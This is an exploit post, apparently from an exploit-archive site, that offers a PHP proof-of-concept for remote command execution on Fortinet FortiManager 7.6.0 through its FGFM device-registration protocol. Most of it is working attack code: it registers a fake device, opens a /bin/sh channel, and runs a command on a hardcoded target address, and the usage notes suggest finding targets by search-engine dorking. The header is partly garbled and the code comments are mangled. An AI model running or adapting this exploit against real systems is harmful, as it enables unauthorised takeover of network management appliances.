=============================================================================================================================================
| # Title : Fortinet FortiManager =============================================================================================================================================
| # Title : Fortinet FortiManager 7.6.0 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://fortiguard.fortinet.com/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] The code is an RCE (Remote Command Execution) exploit of a vulnerability in Fortinet's FortiManager devices, and works via the FGFM protocol.

The code exploits a flaw in the new device registration mechanism to gain access to execute commands on the targeted system.

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php

[+] SeT target = Line : 87

[+] PayLoad :

<?php

class FortinetExploit {
private $host;
private $port = 541;
private $ssl = true;
private $clientCert;
private $clientKey;
private $serialNumber = "FMG-VM0000000000";
private $platform = "FortiManager-VM64";

public function __construct($host, $clientCert = null, $clientKey = null) {
$this->host = $host;
$this->clientCert = $clientCert;
$this->clientKey = $clientKey;
}

public function exploit() {
$socket = $this->makeSocket();
if (!$socket) {
die("[-] Connection failed.\n");
}

echo "[+] Registering device...\n";
$req1 = "get auth\r\nserialno={$this->serialNumber}\r\nplatform={$this->platform}\r\nhostname=localhost\r\n\r\n\x00";
$resp1 = $this->sendPacket($socket, $req1);
if (strpos($resp1, 'reply 200') === false) {
die("[-] Request 1 failed: No reply 200.\n");
}

echo "[+] Creating channel...\n";
$req2 = "get connect_tcp\r\ntcp_port=rsh\r\nchan_window_sz=" . (32 * 1024) . "\r\nterminal=1\r\ncmd=/bin/sh\r\nlocalid=0\r\n\r\n\x00";
$resp2 = $this->sendPacket($socket, $req2);
if (strpos($resp2, 'action=ack') === false) {
die("[-] Request 2 failed: No ack.\n");
}

preg_match('/localid=(\d+)/', $resp2, $matches);
if (!$matches) {
die("[-] Request 2 failed: No localid found.\n");
}
$localid = $matches[1];

echo "[+] Triggering...\n";
$payload = "id"; // ????? ??????? ???? ??????
$req3 = "channel\r\nremoteid={$localid}\r\n\r\n\x00" . strlen($payload) . "\n" . $payload . "0\n";
$this->sendPacket($socket, $req3, false);
}

private function makeSocket() {
$contextOptions = [
'ssl' => [
'verify_peer' => false,
'verify_peer_name' => false,
'allow_self_signed' => true
]
];
if ($this->clientCert) {
$contextOptions['ssl']['local_cert'] = $this->clientCert;
}
if ($this->clientKey) {
$contextOptions['ssl']['local_pk'] = $this->clientKey;
}
$context = stream_context_create($contextOptions);
return stream_socket_client(($this->ssl ? "ssl" : "tcp") . "://{$this->host}:{$this->port}", $errno, $errstr, 30, STREAM_CLIENT_CONNECT, $context);
}

private function sendPacket($socket, $data, $read = true) {
$packet = pack('NN', 0x36E01100, strlen($data) + 8) . $data;
fwrite($socket, $packet);
if (!$read) return null;
$header = fread($socket, 8);
if (!$header) {
echo "[-] Failed to read an FGFM header\n";
return null;
}
list($magic, $len) = unpack('NN', $header);
if ($magic !== 0x36E01100 || $len < 8) {
echo "[-] Bad header\n";
return null;
}
return fread($socket, $len - 8);
}
}

// ??????? ?????
$exploit = new FortinetExploit("192.168.1.1");
$exploit->exploit();



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================